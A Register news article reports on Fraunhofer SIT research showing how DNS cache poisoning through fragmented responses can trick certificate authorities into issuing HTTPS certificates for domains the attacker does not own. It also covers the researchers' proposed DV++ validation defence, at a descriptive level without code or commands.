Security

How to nab a HTTPS cert for a stranger's website: Step one, shatter those DNS queries...

Domain validation systems fooled by boffins

By Richard Chirgwin

15 SHARE

Updated Researchers in Germany have discovered how to obtain HTTPS security certificates for web domains they don't own – even if the certs are protected by PKI-based domain validation.

Essentially, some certificate authorities can be tricked into incorrectly issuing the cryptographic certs, meaning a miscreant can get a SSL/TLS certificate for someone else's domain and use it to create a malicious copy of that website. People fooled into connecting to the faked site will be told by their browsers that the connection is secure, when really they're visiting a spoofed version.

Dr Haya Shulman of the Fraunhofer Institute for Secure Information Technology (SIT), and one of the boffins behind told The Register a "weak off-path attacker" can – using nothing more than a laptop – effectively steal credentials, eavesdrop, or distribute malware using the method. The group at this stage withheld the names of the certificate authorities (CAs) that can be tricked into incorrectly issuing cryptographic certs.

In a paper seen by The Register, to be presented at the ACM's Conference on Computer and Communications Security conference in Toronto, Canada, in October, Dr Shulman's team wrote:

The attack exploits DNS cache poisoning and tricks the CA into issuing fraudulent certificates for domains the attacker does not legitimately own – namely certificates binding the attacker's public key to a victim domain.

The group has asked The Register not to republish the paper because it names affected certificate authorities. We have, however, seen a demo of a live attack by Fraunhofer SIT's team. The technique ensures the DNS domain validation checks run by the CA are performed, in part, using the attacker's DNS server rather than a server belonging to the domain's owner. This can be leveraged by the hacker to therefore obtain a cert for that domain.

"The attack is initiated with a DNS request," the paper explained. "To succeed in the attack, the attacker has to craft a correct DNS response before the authentic response from the real nameserver arrives."

The attack depends on getting said DNS responses broken into fragments, and then injecting malicious fragments to fool the CA into handing over the cert to the attacker. The first fragments of the response contain valid DNS challenge-response fields. The inserted fragments can be whatever the miscreant needs to complete the transaction so that he or she gets the cert.

Network admins will have worked out by now that the attacker needs to do some offline research to get this to work – they have to examine responses from the victim's nameserver to calculate "the offset where the fragmentation should occur."

The research team proposed a domain validation protocol they dubbed "DV++" to block the attack. In summary, DV++ uses a distributed model which sends requests to multiple certification agents.

"To pass a DV++ validation, domain owners must prove their ownership to a majority of the agents in a fully automated manner by responding to queries sent by the agents for the resource records in the domain."

Dr Shulman's collaborators in the project are Markus Brandt, Tianxiang Dai, Amit Klein and Michael Waidner. ®

Editor's note: This article was revised after publication to clarify that it is the websites being spoofed, not the certificates. The certs are handed over to the wrong person, in effect, and used to spoof legit sites.

Sign up to our NewsletterGet IT in your inbox daily

15 Comments

More from The Register

Ministry of Defence's new payroll contract is, surprise, surprise, MIA: Missing In Action

Procurement heads fail to finalise specs for replacement deal, extend current agreement with DXC Technology

Can't get infected via email if your messages aren't delivered: Seven-hour slowdown hits Symantec cloud filters

Wondering why your inbox was so clear? Bad news…

Sort your spending habits out, UK Ministry of Defence told over £20bn black hole

Public Accounts Committee recommends department chains its wallet shut

Judges dismisses majority of Cisco's 'insane' IP defence against Arista

Switch antitrust case rumbles on

Cisco delivers Patch Tuesday warmup with bundle of 18 bug fixes

Unified Comms, Jabber among targets for clean-up

We're two weeks into 2019, and an email can potentially knacker your Cisco message box – plus other bugs to fix

Process data, crash, restart, process data, crash, restart...

Symantec boss Greg Clark exits biz amid dismal financials

Troubled security house keeps up trend of sudden resignations

May Day! PM sacks UK Defence Secretary Gavin Williamson for Huawei 5G green-light 'leak'

Updated Denies wrongdoing, replaced by one-time junior MoD minister Penny Mordaunt

En garde! 'Cyber-war has begun' – and France will hack first, its defence sec declares

FIC2019 Parly-vous cyber-security? No plan to surrender, military bug bounty coming

Strip Capita of defence IT contract unless things improve – Brit MPs

Committee calls for more public spending – but not with outsourcer